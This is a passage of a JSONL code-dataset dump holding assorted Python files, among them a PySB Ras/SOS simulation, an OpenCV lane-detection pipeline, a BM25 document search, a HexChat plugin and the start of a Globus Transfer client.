Try Again.\\n\"\n response = raw_input(\"{}{}{}\".format(error_message, message, \"\\n\"))\n else: check_error = 0\n\n return response\n","sub_path":"game_chooser/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207726009","text":"# Import Packages\nfrom pypresence import Presence\nimport time\n\nclient_id = \"801321552250535977\" # Your application id here\n\n# button labels and urls\nbtn_label_1 = \"Invite Cartero\"\nbtn_label_2 = \"Join Support Server\"\nbtn_url_1 = \"https://discord.com/api/oauth2/authorize?client_id=801321552250535977&permissions=8&scope=bot%20applications.commands\"\nbtn_url_2 = \"https://discord.com/invite/bNZefkNqVw\"\n\n# Rich Presence setup\nRPC = Presence(client_id=client_id)\nRPC.connect()\nRPC.update(\n state='Developing Cartero', # Rich Presence state\n details='Moderation', # Rich Presence details\n small_image='small', small_text='Cartero', # Set small image and its text (Optional)\n large_image='large', large_text='Cartero', # Set large image and its text (Optional)\n buttons=[\n {\"label\": btn_label_1, \"url\": btn_url_1}, # btn 1 (Optional)\n {\"label\": btn_label_2, \"url\": btn_url_2} # btn 2 (Optional)\n ]\n)\n\nprint(\"Rich Presence enabled\")\n\nwhile 1:\n time.sleep(15)\n","sub_path":"RichPresence.py","file_name":"RichPresence.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"315361744","text":"import argparse\nimport datetime\nimport os\nimport subprocess\n\nimport numpy as np\nimport pandas as pd\nfrom pysb import *\nfrom pysb.integrate import odesolve\n\nfrom pysb_t_cell_network import write_columns, write_model_attributes\nfrom src.general.directory_handling import make_and_cd\n\n\ndef add_new_monomer(product):\n try:\n model.monomers[product]\n except:\n Monomer(product)\n Initial(eval(product + \"()\"), Parameter(product + \"_0\", 0))\n\n\ndef add_observable(species):\n Observable(\"O_{0}\".format(species), eval('{0}()'.format(species)))\n\n\nclass SoSFeedback(object):\n\n def __init__(self):\n self.run_time = 300\n self.tspan = np.linspace(0, self.run_time)\n\n self.sos = [round(i) for i in np.linspace(25, 500, num=40)]\n\n self.model = Model()\n\n def define_monomers(self):\n Monomer('Sos')\n Monomer('Ras_GDP')\n Monomer('Ras_GTP')\n Monomer('Ras_GAP')\n\n Parameter('Sos_0', self.sos[0])\n Parameter('Ras_GDP_0', 300)\n Parameter('Ras_GAP_0', 10)\n Parameter('Ras_GTP_0', 0)\n\n Initial(Sos(), Sos_0)\n Initial(Ras_GDP(), Ras_GDP_0)\n Initial(Ras_GAP(), Ras_GAP_0)\n Initial(Ras_GTP(), Ras_GTP_0)\n\n def add_step_1(self):\n Parameter('k_sos_on_rgdp', 0.0024)\n Parameter('k_sos_off_rgdp', 3.0)\n\n product = \"Sos_Ras_GDP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product), Sos() + Ras_GDP() | eval('{0}()'.format(product)),\n k_sos_on_rgdp, k_sos_off_rgdp)\n\n add_observable(product)\n return product\n\n def add_step_2(self):\n Parameter('k_sos_on_rgtp', 0.0022)\n Parameter('k_sos_off_rgtp', 0.4)\n\n product = \"Sos_Ras_GTP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product), Sos() + Ras_GTP() | eval('{0}()'.format(product)),\n k_sos_on_rgtp, k_sos_off_rgtp)\n\n add_observable(product)\n\n return product\n\n def add_step_3(self):\n Parameter('k_rgdp_on_sos_rgtp', 0.001)\n Parameter('k_rgdp_off_sos_rgtp', 0.1)\n Parameter('k_cat_3', 0.038 * 1.7)\n\n previous_product = self.add_step_2()\n\n 
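# get_input in utils.py above is Python 2 code (raw_input). A straight
# Python 3 port of the same confirm-then-coerce loop, behaviourally
# equivalent except that the bare except is narrowed:
def get_input(data_type, message):
    """Ask the user for input, confirm it, then coerce it to data_type."""
    response = input("{}\n".format(message))
    while input("You entered: '{}'. Press ENTER if that is correct:".format(response)) != '':
        response = input("{}\n".format(message))
    while True:
        try:
            return data_type(response)
        except (TypeError, ValueError):
            response = input("Your input isn't the correct type. Try Again.\n{}\n".format(message))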
product = \"Sos_Ras_GTP_Ras_GDP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product),\n eval('{0}()'.format(previous_product)) + Ras_GDP() | eval('{0}()'.format(product)),\n k_rgdp_on_sos_rgtp, k_rgdp_off_sos_rgtp)\n\n Rule('{0}_cat'.format(product),\n eval('{0}()'.format(product)) >> eval('{0}()'.format(previous_product)) + Ras_GTP(),\n k_cat_3)\n\n def add_step_4(self):\n Parameter('k_rgdp_on_sos_rgdp', 0.0014)\n Parameter('k_rgdp_off_sos_rgdp', 1.0)\n Parameter('k_cat_4', 0.003)\n\n previous_product = self.add_step_1()\n\n product = \"Sos_Ras_GDP_Ras_GDP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product),\n eval('{0}()'.format(previous_product)) + Ras_GDP() | eval('{0}()'.format(product)),\n k_rgdp_on_sos_rgdp, k_rgdp_off_sos_rgdp)\n\n Rule('{0}_cat'.format(product),\n eval('{0}()'.format(product)) >> eval('{0}()'.format(previous_product)) + Ras_GTP(),\n k_cat_4)\n\n def add_step_5(self):\n Parameter('k_rgap_on_rgtp', 0.0348)\n Parameter('k_rgap_off_rgtp', 0.2)\n Parameter('k_cat_5', 0.1)\n\n product = \"Ras_GAP_Ras_GTP\"\n add_new_monomer(product)\n\n Rule('{0}_bind'.format(product),\n Ras_GAP() + Ras_GTP() | eval('{0}()'.format(product)),\n k_rgap_on_rgtp, k_rgap_off_rgtp)\n\n add_observable(product)\n\n Rule('{0}_cat'.format(product),\n eval('{0}()'.format(product)) >> Ras_GAP() + Ras_GDP(),\n k_cat_5)\n\n def make_model(self):\n # Model()\n\n self.define_monomers()\n\n observables = []\n\n self.add_step_3()\n self.add_step_4()\n self.add_step_5()\n\n add_observable(\"Ras_GTP\")\n\n product = \"Ras_GTP\"\n observables.append(\"O_{0}\".format(product))\n\n return observables\n\n def main(self):\n sos_array = []\n output = []\n observables = self.make_model()\n\n write_columns(observables)\n write_model_attributes(model.rules, \"rules\")\n write_model_attributes(model.parameters, \"parameters\")\n write_model_attributes(model.observables, \"observables\")\n\n np.savetxt(\"time\", self.tspan, fmt='%f')\n\n for sos in self.sos:\n model.parameters['Sos_0'].value = sos\n y = odesolve(model, self.tspan, compiler=\"python\")\n\n sos_array.append(sos)\n # print(y[observables[0]][-1])\n output.append(y[observables[0]][-1])\n\n df = pd.DataFrame({'Sos': sos_array, 'RasGTP': output})\n df.to_csv(\"./sos_rasgtp\", sep='\\t')\n\n # np.savetxt(\"Sos\", sos_array, fmt='%f')\n # np.savetxt(\"RasGTP\", output, fmt='%f')\n\n\nclass SoSFeedbackLigandSpecific(SoSFeedback):\n def __init__(self):\n SoSFeedback.__init__(self)\n\n self.sos_total = [round(i) for i in np.linspace(25, 500, num=40)]\n\n\nclass LaunchQsub(object):\n def __init__(self):\n self.simulation_name = \"Sos_FB\"\n self.simulation_time = 2\n\n def generate_qsub(self):\n q = open(\"qsub.sh\", \"w\")\n q.write(\"#PBS -m ae\\n\")\n q.write(\"#PBS -q short\\n\")\n q.write(\"#PBS -V\\n\")\n q.write(\"#PBS -l walltime={1},nodes=1:ppn=2 -N {0}\\n\\n\".format(self.simulation_name,\n datetime.timedelta(\n minutes=self.simulation_time)))\n q.write(\"cd $PBS_O_WORKDIR\\n\")\n q.write(\"echo $PBS_JOBID > job_id\\n\\n\")\n\n q.write(\n \"python ~/SSC_python_modules/pysb_sos_fb.py --run\\n\")\n q.close()\n\n def launch(self):\n (stdout, stderr) = subprocess.Popen([\"qsub {0}\".format(\"qsub.sh\")], shell=True, stdout=subprocess.PIPE,\n cwd=os.getcwd()).communicate()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Submitting ode calculations as function of steps\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--run', action='store_true', default=False,\n 
help='Flag for submitting simulations.')\n\n args = parser.parse_args()\n\n if not args.run:\n make_and_cd(\"Ras_SoS_Fb_200\")\n qsub = LaunchQsub()\n qsub.generate_qsub()\n qsub.launch()\n else:\n sos = SoSFeedback()\n sos.main()\n","sub_path":"src/data/pysb_ras_sos.py","file_name":"pysb_ras_sos.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435857360","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('static', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='file',\n name='target',\n field=models.CharField(max_length=100,\n choices=[(b'catalog.Product.images', b'Product Image'),\n (b'category.Category.image', b'Category Image')]),\n ),\n ]\n","sub_path":"src/static/migrations/0002_auto_20150623_1707.py","file_name":"0002_auto_20150623_1707.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"225746284","text":"import cProfile\nimport json\nimport argparse\nimport glob\nimport collections\nimport itertools\n\nimport cv2\nimport numpy as np\nimport os\n\n\ndef region_of_interest(img, vertices):\n mask = np.zeros_like(img)\n\n if len(img.shape) > 2:\n channel_count = img.shape[2]\n select_mask_color = (255,) * channel_count\n else:\n select_mask_color = 255\n\n cv2.fillPoly(mask, vertices, select_mask_color)\n\n return cv2.bitwise_and(img, mask)\n\n\ndef sliding_window_search(nonzeroy, nonzerox, y_size, base, search_img):\n nwindows = 8\n window_height = np.int(y_size / nwindows)\n current = base\n margin = 40\n minpix = 10\n lane_inds = []\n\n for window in range(nwindows):\n win_y_low = y_size - (window + 1) * window_height\n win_y_high = y_size - window * window_height\n win_x_low = current - margin\n win_x_high = current + margin\n good_inds_mask = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high)\n & (nonzerox >= win_x_low) & (nonzerox < win_x_high))\n good_inds = good_inds_mask.nonzero()[0]\n\n lane_inds.append(good_inds)\n\n if len(good_inds) > minpix:\n current = np.int(np.mean(nonzerox[good_inds]))\n\n if search_img is not None:\n cv2.rectangle(search_img, (win_x_low, win_y_low), (win_x_high, win_y_high), 255, 2)\n\n lane_inds = np.concatenate(lane_inds)\n\n return nonzeroy[lane_inds], nonzerox[lane_inds]\n\n\ndef crop_image(input_img):\n y_size = input_img.shape[0]\n if input_img.shape[0] != 128:\n raise Exception(\"expected y dimension 128 but got: %d\" % y_size)\n cropped = input_img[88:, :, :]\n assert cropped.shape[0] == 40\n assert cropped.shape[1] == 160\n return cropped\n\n\nPipelineResult = collections.namedtuple(\"PipelineResult\",\n [\"input_img\", \"cropped\",\n \"sobel_h_x\", \"sobel_h_y\", \"sobel_h_mag\",\n \"sobel_h_mag_scaled\", \"sobel_h_thresholded\",\n \"sobel_s_thresholded\",\n \"l_threshold_mask\",\n \"yellow_mask\",\n \"binary\",\n \"search_img\",\n \"hls\", \"blurred_s\",\n \"sobel_s_mag_scaled\",\n \"blurred_h\",\n \"warped_input\",\n \"warped\", \"num_pts\", \"linex\", \"liney\",\n \"line_fit\"])\n\n\ndef get_yellow_mask(hls):\n lower_yellow = (21.25, 75, 40)\n # lower_yellow = (21.25, 75, 100.0)\n upper_yellow = (50, 178.5, 255)\n mask = cv2.inRange(hls, lower_yellow, upper_yellow)\n return mask\n\n\ndef get_ground_polygon():\n d1 = (0, 40) # bottom left of polygon\n d2 = (62, 0) # top left of 
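# SoSFeedback.main() above writes its Sos -> RasGTP dose response to a
# tab-separated file named "sos_rasgtp" (with a pandas index column). A short
# sketch for inspecting that output, assuming the scan has already been run:
import pandas as pd

scan = pd.read_csv("./sos_rasgtp", sep="\t", index_col=0)
print(scan.sort_values("Sos").head())  # columns per the script: Sos, RasGTP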
polygon\n d3 = (98, 0) # top right of polygon\n d4 = (160, 40) # bottom right of polygon\n return np.int32([d1, d2, d3, d4])\n\n\ndef _perspective_mat_dst():\n d1 = (40, 40) # bottom mid-left\n d2 = (40, 0) # top mid-left\n d3 = (120, 0) # top mid-right\n d4 = (120, 40) # bottom mid-right\n return np.float32([d1, d2, d3, d4])\n\nclass Processor(object):\n\n def __init__(self, mtx, dist):\n self.mtx = mtx\n self.dist = dist\n src = get_ground_polygon().astype(np.float32)\n dst = _perspective_mat_dst()\n self.perspective_mat = cv2.getPerspectiveTransform(src, dst)\n self.perspective_mat_inv = cv2.getPerspectiveTransform(dst, src)\n\n def undistort(self, cropped):\n if self.mtx is not None:\n return cv2.undistort(cropped, mtx, dist, None, mtx)\n else:\n return cropped\n\n def inv_warp(self, img):\n return cv2.warpPerspective(\n img, self.perspective_mat_inv, (160, 40), flags=cv2.INTER_LINEAR)\n\n def warp(self, img):\n # copy = np.copy(img)\n # cv2.polylines(copy, [get_ground_polygon()], True, [255, 0, 255], 5)\n return cv2.warpPerspective(\n img, self.perspective_mat, (160, 40), flags=cv2.INTER_LINEAR)\n\n\n def process(self, input_img, debug=False):\n cropped = crop_image(input_img)\n\n y_size = 40\n x_size = 160\n assert cropped.shape[0] == y_size\n assert cropped.shape[1] == x_size\n\n undistorted = self.undistort(cropped)\n\n hls = cv2.cvtColor(cropped, cv2.COLOR_BGR2HLS)\n h_channel = hls[:, :, 0]\n l_channel = hls[:, :, 1]\n s_channel = hls[:, :, 2]\n\n blurred_s = cv2.GaussianBlur(s_channel, (5, 5), 0)\n blurred_h = cv2.GaussianBlur(h_channel, (5, 5), 0)\n\n yellow_mask = get_yellow_mask(hls)\n\n l_threshold_mask = cv2.inRange(l_channel, 50, 255)\n\n sobel_h_x = cv2.Sobel(blurred_h, cv2.CV_64F, 1, 0, ksize=5)\n sobel_h_y = cv2.Sobel(blurred_h, cv2.CV_64F, 0, 1, ksize=5)\n sobel_h_mag = np.sqrt(sobel_h_x ** 2 + sobel_h_y ** 2)\n sobel_h_mag = cv2.bitwise_and(sobel_h_mag, sobel_h_mag, mask=yellow_mask)\n\n sobel_h_scale_factor = np.max(sobel_h_mag) / 255\n if sobel_h_scale_factor > 0:\n sobel_h_mag_scaled = sobel_h_mag / sobel_h_scale_factor\n else:\n sobel_h_mag_scaled = sobel_h_mag\n sobel_h_threshold_mask = cv2.inRange(sobel_h_mag_scaled, 50, 255)\n sobel_h_thresholded = cv2.bitwise_and(sobel_h_mag_scaled, sobel_h_mag_scaled, mask=sobel_h_threshold_mask)\n\n sobel_s_x = cv2.Sobel(blurred_s, cv2.CV_64F, 1, 0, ksize=5)\n sobel_s_y = cv2.Sobel(blurred_s, cv2.CV_64F, 0, 1, ksize=5)\n sobel_s_mag = np.sqrt(sobel_s_x ** 2 + sobel_s_y ** 2)\n sobel_s_mag = cv2.bitwise_and(sobel_s_mag, sobel_s_mag, mask=yellow_mask)\n\n sobel_s_scale_factor = np.max(sobel_s_mag) / 255\n if sobel_s_scale_factor > 0:\n sobel_s_mag_scaled = sobel_s_mag / sobel_s_scale_factor\n else:\n sobel_s_mag_scaled = sobel_s_mag\n sobel_s_threshold_mask = cv2.inRange(sobel_s_mag_scaled, 50, 255)\n sobel_s_thresholded = cv2.bitwise_and(sobel_s_mag_scaled, sobel_s_mag_scaled, mask=sobel_s_threshold_mask)\n\n binary = np.ones_like(s_channel)\n binary = cv2.bitwise_and(binary, binary, mask=sobel_h_threshold_mask)\n binary = cv2.bitwise_and(binary, binary, mask=sobel_s_threshold_mask)\n\n if debug:\n warped_input = self.warp(cropped)\n else:\n warped_input = None\n\n warped_binary = self.warp(binary)\n\n histogram = np.sum(warped_binary[20:, :], axis=0)\n nonzero = warped_binary.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n x_base = np.argmax(histogram)\n\n if debug:\n search_img = np.zeros_like(warped_binary)\n else:\n search_img = None\n\n liney, linex = sliding_window_search(nonzeroy, 
nonzerox, y_size, x_base, search_img)\n num_pts = len(linex)\n if num_pts >= 10:\n line_fit = np.polyfit(liney, linex, 1)\n else:\n line_fit = None\n\n return PipelineResult(\n input_img=input_img,\n yellow_mask=yellow_mask,\n sobel_h_x=sobel_h_x,\n l_threshold_mask=l_threshold_mask,\n sobel_h_y=sobel_h_y,\n sobel_h_mag=sobel_h_mag,\n sobel_h_mag_scaled=sobel_h_mag_scaled,\n sobel_s_mag_scaled=sobel_s_mag_scaled,\n sobel_h_thresholded=sobel_h_thresholded,\n sobel_s_thresholded=sobel_s_thresholded,\n cropped=cropped,\n hls=hls,\n search_img=search_img,\n binary=binary,\n blurred_s=blurred_s,\n blurred_h=blurred_h,\n warped_input=warped_input,\n warped=warped_binary,\n liney=liney,\n linex=linex,\n line_fit=line_fit,\n num_pts=num_pts)\n\n\ndef handle_filepath(args, processor, filepath, report_file):\n bgr_image = load_bgr_image(filepath)\n result = processor.process(bgr_image)\n if report_file is not None:\n doc = {}\n doc['image'] = filepath\n if result.line_fit is None:\n doc['fit'] = False\n else:\n doc['fit'] = True\n doc['weight'] = result.num_pts\n doc['c0'] = result.line_fit[0]\n doc['c1'] = result.line_fit[1]\n json.dump(doc, report_file)\n report_file.write(\"\\n\")\n report_file.flush()\n\n\ndef load_bgr_image(bgr_filepath):\n bgr_array = np.fromfile(bgr_filepath, dtype=np.uint8)\n bgr_image = bgr_array.reshape(128, 160, 3)\n return bgr_image\n\n\ndef run3(args, processor, report_file):\n if args.imgfile is not None:\n with open(args.imgfile, \"r\") as infile:\n while True:\n line = infile.readline()\n if line is None:\n break\n filepath = line.rstrip()\n handle_filepath(args, processor, filepath, report_file)\n else:\n bgr_filepaths = list(glob.glob(os.path.join(args.imgdir, \"*.bgr\")))\n if args.ntake is not None:\n bgr_filepaths = take(args.ntake, bgr_filepaths)\n for filepath in bgr_filepaths:\n handle_filepath(args, processor, filepath, report_file)\n\n\ndef run2(args, processor):\n run3(args, processor, args.report)\n\n\ndef run1(args):\n if args.calibration is not None:\n with open(args.calibration, \"r\") as infile:\n doc = json.load(infile)\n mtx = np.array(doc['mtx'])\n dist = np.array(doc['dist'])\n processor = Processor(mtx, dist)\n else:\n processor = Processor(None, None)\n\n run2(args, processor)\n\n\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(itertools.islice(iterable, n))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--demo\", action=\"store_true\")\n parser.add_argument(\"--imgdir\", default=\"/dev/shm/bgr\")\n parser.add_argument(\"--ntake\", default=None, type=int)\n parser.add_argument(\"--imgfile\")\n parser.add_argument(\"--report\", type=argparse.FileType('w'))\n parser.add_argument(\"--calibration\")\n args = parser.parse_args()\n return args\n\n\ndef demo():\n args = parse_args()\n run1(args)\n\n\ndef main():\n args = parse_args()\n\n if args.demo:\n cProfile.run('demo()', sort='cumulative')\n else:\n run1(args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lines/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"516968808","text":"from time import sleep\n\nfrom selenium import webdriver\nfrom selenium.webdriver import TouchActions\n\n\nclass TestTouchAc():\n def setup(self):\n op = webdriver.ChromeOptions()\n op.add_experimental_option('w3c', False)\n self.driver = webdriver.Chrome(options=op)\n 
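# A minimal driver for the lane-finding Processor above, assuming pipeline.py
# is importable as a module. process() expects a 128x160 BGR frame; line_fit,
# when present, is np.polyfit(liney, linex, 1), i.e. x as a function of warped y:
import numpy as np
from pipeline import Processor  # import path is an assumption

proc = Processor(None, None)                     # no camera calibration
frame = np.zeros((128, 160, 3), dtype=np.uint8)  # synthetic blank frame
result = proc.process(frame, debug=True)
if result.line_fit is not None:
    x_bottom = np.polyval(result.line_fit, 39)   # lane x at the bottom row of the warp
else:
    x_bottom = None                              # fewer than 10 lane pixels found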
self.driver.implicitly_wait(10)\n self.driver.maximize_window()\n\n def teardown(self):\n self.driver.quit()\n\n def test_touchaction_scrollbottom(self):\n self.driver.get(\"https://www.baidu.com\")\n self.driver.find_element_by_id(\"kw\").send_keys(\"selenium\")\n self.driver.find_element_by_id(\"su\").click()\n\n action_search = TouchActions(self.driver)\n action_search.tap(self.driver.find_element_by_id(\"su\")).perform()\n el = self.driver.find_element_by_id(\"su\")\n action = TouchActions(self.driver)\n\n action.scroll_from_element(el, 10, 10000).perform()\n self.driver.find_element_by_css_selector('#page_addmeber > div > a.n').click()\n sleep(3)\n\n\n\n","sub_path":"cekai/Hogwarts_selenium_Exercise/pytest_exercise_selenium/Exercise_selenium/test_TouchAction.py","file_name":"test_TouchAction.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439059437","text":"\"\"\"\npy2app/py2exe build script for MyApplication.\n\nWill automatically ensure that all build prerequisites are available\nvia ez_setup\n\nUsage (Mac OS X):\npython setup.py py2app\n\nUsage (Windows):\npython setup.py py2exe\n\"\"\"\nimport ez_setup\nez_setup.use_setuptools()\n\nimport sys\nfrom setuptools import setup\n\nAPP = 'Python/ISDPR.py'\n\nif sys.platform == 'darwin':\n extra_options = dict(\n setup_requires=['py2app'],\n app=[APP],\n # Set the application icon\n options=dict(\n py2app=dict(iconfile='Icons/icon.icns')),\n )\nelif sys.platform == 'win32':\n extra_options = dict(\n setup_requires=['py2exe'],\n app=[APP],\n ) \nelse:\n extra_options = dict(\n # Normally unix-like platforms will use \"setup.py install\"\n # and install the main script as such\n scripts=[APP],\n ) \n\nsetup(\n name=\"ISDPR\",\n **extra_options\n)","sub_path":"src/master_setup.py","file_name":"master_setup.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583525088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 12 23:55:57 2020\n\n@author: hongfei7\n\"\"\"\n\nimport gensim\nfrom gensim.summarization import bm25\nimport os\nimport heapq\nimport spacy\n\n# NLTK\nfrom nltk.stem import PorterStemmer\n\nfilenames = []\n\ndef tokenization(filename):\n result = []\n filepath = \"corpus/\" + filename\n with open(filepath, 'r') as f:\n text = f.read()\n words = text.split('\\t')\n for word in words:\n if word != \"\":\n result.append(word)\n return result\n\ndef read_corpus(dir_path):\n corpus = [];\n for root,dirs,files in os.walk(dir_path):\n for f in files:\n if f == \".DS_Store\":\n continue\n corpus.append(tokenization(f))\n #print(\"file is :\" + f)\n new_filename = f.split(\".\")[0] + \".pdf\"\n filenames.append(new_filename)\n print(\"Corpus size is :\" + str(len(corpus)))\n return corpus\n # dictionary = corpora.Dictionary(corpus)\n # print len(dictionary)\n\nif __name__ == \"__main__\":\n dir_path = 'corpus/'\n \n # BM25 Model\n texts = read_corpus(dir_path)\n bm25Model = bm25.BM25(texts)\n \n # Doc Cosine Similarity\n dictionary = gensim.corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(doc) for doc in texts]\n \n tf_idf = gensim.models.TfidfModel(corpus)\n index = gensim.similarities.SparseMatrixSimilarity(tf_idf[corpus], num_features=len(dictionary))\n \n nlp = spacy.load('en_core_web_sm', disable=['parser', 'ner'])\n allowed_postags = ['NOUN', 'ADJ', 'VERB', 'ADV']\n \n while True:\n search_type 
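# The test above disables the W3C dialect ('w3c', False) precisely because
# TouchActions is a legacy, non-W3C API. On current Selenium the same page
# scroll can be done without that option, e.g. via JavaScript:
from selenium import webdriver

driver = webdriver.Chrome()
driver.get("https://www.baidu.com")
driver.execute_script("window.scrollBy(0, 10000);")  # W3C-safe scroll
driver.quit()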
= input(\"Please input your search type (bm25 or sim): \")\n query_str = input(\"Please input your query: \")\n \n \n query = []\n for word in query_str.strip().split():\n query.append(word.lower())\n lemmatized = []\n res = nlp(\" \".join(query))\n for token in res:\n lemmatized.append(token.lemma_)\n #print(lemmatized)\n # STEMMING\n stemmer = PorterStemmer()\n stemmed = [stemmer.stem(x) for x in lemmatized]\n query = stemmed\n \n if search_type == \"bm25\":\n scores = bm25Model.get_scores(query)\n \n # get the top 10 indexes\n indexes = heapq.nlargest(10, range(len(scores)), scores.__getitem__)\n \n # get the top 10 values\n values = heapq.nlargest(10,scores)\n \n # print(indexes)\n print(values)\n \n for i in indexes:\n print(filenames[i])\n\n elif search_type == \"sim\":\n query_doc_bow = dictionary.doc2bow(query)\n sims = index[tf_idf[query_doc_bow]]\n \n indexes = heapq.nlargest(10, range(len(sims)), sims.__getitem__)\n \n values = heapq.nlargest(10,sims)\n \n # print(indexes)\n print(values)\n \n for i in indexes:\n print(filenames[i])\n else:\n print(\"Invalid type!\\n\")\n","sub_path":"Recommend_Slides/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"269138984","text":"from Features import Features\n\ndef load_data_and_create_features(path, dataset='Train', Features_Object = None):\n with open(path) as f:\n content = f.readlines()\n content = [x.strip() for x in content]\n words_set, tags_set = get_words_and_tags_set(content)\n if dataset=='Train':\n features_object = Features(words_set,tags_set)\n elif dataset=='Test':\n features_object = Features_Object\n word_possible_labels = {}\n words = []\n tags = []\n features = []\n print('creating words,tags and features')\n for idx, line in enumerate(content):\n #uncomment if we want to add ** in start of santance\n words.extend(['*', '*'])\n tags.extend(['*', '*'])\n features.extend([[],[]])\n splited_line = line.split()\n for i,word_tag in enumerate(splited_line):\n word, tag = word_tag.split('_')\n words.append(word)\n tags.append(tag)\n try:\n next_word, _ = splited_line[i+1].split('_')\n except IndexError:\n next_word = 'STOP'\n current_word_features = features_object.set_features_for_word(words[-3:],tags[-3:],next_word)\n features.append(current_word_features)\n #test\n #features_object.multiply_features_with_weighets(features[-1])\n #if word exists append tag to wotds list, else create a list and append the tag\n #word_possible_labels.setdefault(word, []).append(tag)\n words.append('STOP')\n tags.append('STOP')\n features.extend([[]])\n return words,tags,features,features_object\n\ndef get_words_and_tags_set(content):\n words_set = set()\n tags_set = set()\n for line in content:\n for word_tag in line.split():\n word, tag = word_tag.split('_')\n words_set.add(word)\n tags_set.add(tag)\n words_set.add('STOP')\n words_set.add('*')\n tags_set.add('STOP')\n tags_set.add('*')\n return words_set, tags_set\n\ndef create_word_tag_pairs(words_set,tags_set):\n word_tag_pairs = set()\n for tag in tags_set:\n for word in words_set:\n word_tag_pairs.add((tag,word))\n word_tag_pairs.add(('STOP','STOP'))\n\n\n\nif __name__ == '__main__':\n words, tags, features, Features_object = load_data_and_create_features('data/train.wtag','Train')\n load_data_and_create_features('data/test.wtag', 'Test', 
Features_object)\n\n\n","sub_path":"load_corpus.py","file_name":"load_corpus.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"291838999","text":"# rbtext.py by ApolloJustice\n# for use with Python 3\n# non PEP-8 compliant because honestly fuck that\n# probably not commented because too lazy\n\n__module_name__ = \"RainbowFonts\"\n__module_version__ = \"1.0\"\n__module_description__ = \"Rainbowifies text\"\n__author__ = \"ApolloJustice\"\n\nimport hexchat\nimport random\n\ndef rainbow(word, word_eol, userdata):\n\n\trainbowstr = \"\"\n\n\tfor character in word_eol[1]: rainbowstr += '\\003' + str(random.randint(2, 15)) + character\n\n\thexchat.command(\"say \" + rainbowstr)\n\trainbowstr = \"\"\n\treturn hexchat.EAT_ALL\n\nhexchat.hook_command(\"rb\", rainbow, help=\"/rb rainbowifies text\")\nhexchat.emit_print(\"Notice\", __module_name__ + \" [S]\", \"%s by %s loaded. You are using version %s of the script.\" % (__module_name__, __author__, __module_version__))","sub_path":"rbtext.py","file_name":"rbtext.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"128792859","text":"import logging\nimport time\nimport uuid\nfrom typing import Any, Dict, Iterable, List, Optional, Union\n\nfrom globus_sdk import client, exc, paging, response, utils\nfrom globus_sdk.scopes import TransferScopes\n\nfrom .errors import TransferAPIError\nfrom .response import ActivationRequirementsResponse, IterableTransferResponse\n\nlog = logging.getLogger(__name__)\n\nID_PARAM_TYPE = Union[bytes, str, uuid.UUID]\n\n\ndef _get_page_size(paged_result):\n return len(paged_result[\"DATA\"])\n\n\nclass TransferClient(client.BaseClient):\n r\"\"\"\n Client for the\n `Globus Transfer API `_.\n\n This class provides helper methods for most common resources in the\n REST API, and basic ``get``, ``put``, ``post``, and ``delete`` methods\n from the base rest client that can be used to access any REST resource.\n\n Detailed documentation is available in the official REST API\n documentation, which is linked to from the method documentation. Methods\n that allow arbitrary keyword arguments will pass the extra arguments as\n query parameters.\n\n :param authorizer: An authorizer instance used for all calls to\n Globus Transfer\n :type authorizer: :class:`GlobusAuthorizer\\\n `\n\n **Paginated Calls**\n\n Methods which support pagination can be called as paginated or unpaginated methods.\n If the method name is ``TransferClient.foo``, the paginated version is\n ``TransferClient.paginated.foo``.\n Using ``TransferClient.endpoint_search`` as an example::\n\n from globus_sdk import TransferClient\n tc = TransferClient(...)\n\n # this is the unpaginated version\n for x in tc.endpoint_search(\"tutorial\"):\n print(\"Endpoint ID: {}\".format(x[\"id\"]))\n\n # this is the paginated version\n for page in tc.paginated.endpoint_search(\"testdata\"):\n for x in page:\n print(\"Endpoint ID: {}\".format(x[\"id\"]))\n\n .. 
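# rbtext.py above emits '\003' + str(randint(2, 15)) + char, so a single-digit
# colour code followed by a digit character in the message is read by IRC
# clients as a two-digit colour. Zero-padding the code avoids that; a
# standalone sketch of the fixed transform (not wired into HexChat):
import random

def rainbowify(text):
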